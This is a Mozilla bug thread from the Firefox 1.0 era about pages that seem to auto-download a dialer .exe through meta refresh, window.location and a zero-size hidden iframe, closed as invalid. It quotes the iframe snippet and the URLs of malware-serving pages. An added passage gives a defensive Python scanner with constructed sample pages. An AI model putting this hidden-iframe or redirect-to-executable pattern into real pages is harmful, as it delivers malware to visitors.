Closed Bug 279499 Opened 20 years ago Closed 20 years ago

auto download of malware, using javascripts contents and window.location

Categories

(Toolkit :: Downloads API, defect)

1.7 Branch
x86
Windows XP
defect
Not set
critical

Tracking

RESOLVED INVALID

People

(Reporter: steveb, Assigned: bugs)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0

There is a security problem with JavaScript, which allows automatic downloads
of content, such as spyware .EXE files. Using the following commands:

<meta http-equiv="REFRESH" content="1;URL=http://
window.location="http:// and the window.setTimeout( functions

I've uploaded an example here (text file, download with Save As) for someone to
look at, which as you can see, downloads cmb_243461.exe automatically which is a
dialer

http://info.sanesecurity.com/dload.txt

Reproducible: Always

Steps to Reproduce:
1. Do a Save As on this link: http://info.sanesecurity.com/dload.txt
2. Rename dload.txt to dload.html
3. Open dload.html with Firefox and it auto-downloads malware :(

Actual Results:
It auto-downloads malware, an exe file... note it does not autorun, but
will just sit there in your downloads folder, ready for you to click on it
with Explorer :(

Expected Results:
Ignored the download, or pop up a warning box

what do you mean with "automatic download" ?

All I get is a file/save as dialog as expected (no security problem) ?
(The file is also predownloaded in the temp directory which is also no
security problem)

(In reply to comment #1)
> what do you mean with "automatic download" ?
> 
> All I get is a file/save as dialog as expected (no security problem) ?
> (The file is also predownloaded in the temp directory which is also no
> security problem)

I think the problem is when it's called from another script/iframe.

This page here: httx://www.andr.net/sn/?l=n&pn=4 (AUTO DOWNLOADS BE CAREFUL)
loads a script from here: httx://****-access.com/b/?id=st00071
(replace httx with http)

Which then loads: 
<iframe width=0 height=0 src=http://217.73.66.1/dload.html?dload=243461>

The dload.html is the same as dload.txt that you've already seen.

You end up with cmb_243461.exe in your downloads directory, which is a dialer!

Hope that helps (but be careful)
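
Added example, not part of the original bug thread: a defender-side Python scanner for the chain the comment above describes (a zero-size iframe whose page uses a meta refresh or `window.location` assignment pointing at an executable). The sample pages, the `example.invalid` host and the names `scan` and `DownloadTriggerScanner` are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample pages; the example.invalid host and file names are placeholders.
OUTER = ('<html><body><iframe width=0 height=0 '
         'src=http://a.example.invalid/dload.html?dload=1></iframe></body></html>')
INNER = ('<html><head><meta http-equiv="REFRESH" '
         'content="1;URL=http://a.example.invalid/files/setup.exe"></head><body>'
         '<script>window.setTimeout(function(){'
         'window.location="http://a.example.invalid/files/setup.exe";}, 1000);'
         '</script></body></html>')
BENIGN = ('<html><head><meta http-equiv="refresh" content="5;URL=/home.html"></head>'
          '<body><iframe width="300" height="200" src="/map.html"></iframe></body></html>')

EXEC_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".msi")
ZERO = ("0", "0px")
REFRESH_URL = re.compile(r"\s*\d+\s*[;,]\s*url\s*=\s*['\"]?([^'\"\s]+)", re.I)
JS_LOCATION = re.compile(r"location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]", re.I)

def is_executable(url):
    return urlparse(url).path.lower().endswith(EXEC_EXT)

class DownloadTriggerScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self.in_script = [], False
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip() for k, v in attrs}
        self.in_script = tag == "script"
        if tag == "iframe" and a.get("width") in ZERO and a.get("height") in ZERO:
            self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = REFRESH_URL.match(a.get("content", ""))
            if m and is_executable(m.group(1)):
                self.findings.append(("meta-refresh-exe", m.group(1)))
    def handle_endtag(self, tag):
        self.in_script = False
    def handle_data(self, data):
        if self.in_script:  # script bodies arrive here as raw text
            for url in JS_LOCATION.findall(data):
                if is_executable(url):
                    self.findings.append(("js-location-exe", url))

def scan(html):
    scanner = DownloadTriggerScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings
```

A finding only says the page tries to start a download without a click; as the later comments note, a default profile still shows the save prompt.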



WFM. I'm willing to believe there's some way to get a profile into such a state
that it will automatically download, maybe through an insecure extension or
something, but for me with a fresh 1.0 or a fresh nightly profile,
dload.txt/html just prompts to save, and andr.net does nothing at all.

Hi,

I did a complete uninstall of Firefox, deleted my profile, downloaded and
installed a fresh v1.0. The site now asks if I want to download.

Problem solved - must have been something in my profile.

Thanks for looking at the problem so promptly.

Firefox Team rocks!

Steve

Status: UNCONFIRMED → RESOLVED
Closed: 20 years ago
Resolution: --- → FIXED
Status: RESOLVED → UNCONFIRMED
Resolution: FIXED → ---
Version: unspecified → 1.0 Branch
Status: UNCONFIRMED → RESOLVED
Closed: 20 years ago
Resolution: --- → INVALID

Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b) Gecko/20050124
Firefox/1.0+

I think that I am seeing the same as everyone else: My Save File dialogue starts
"You have chosen to open ... which is a: MS-DOS Executable".

Of course, I haven't "chosen" to open it; and if there were a preference to
disable downloads evinced by refresh onload handlers et cetera, I would use it.

Product: Firefox → Toolkit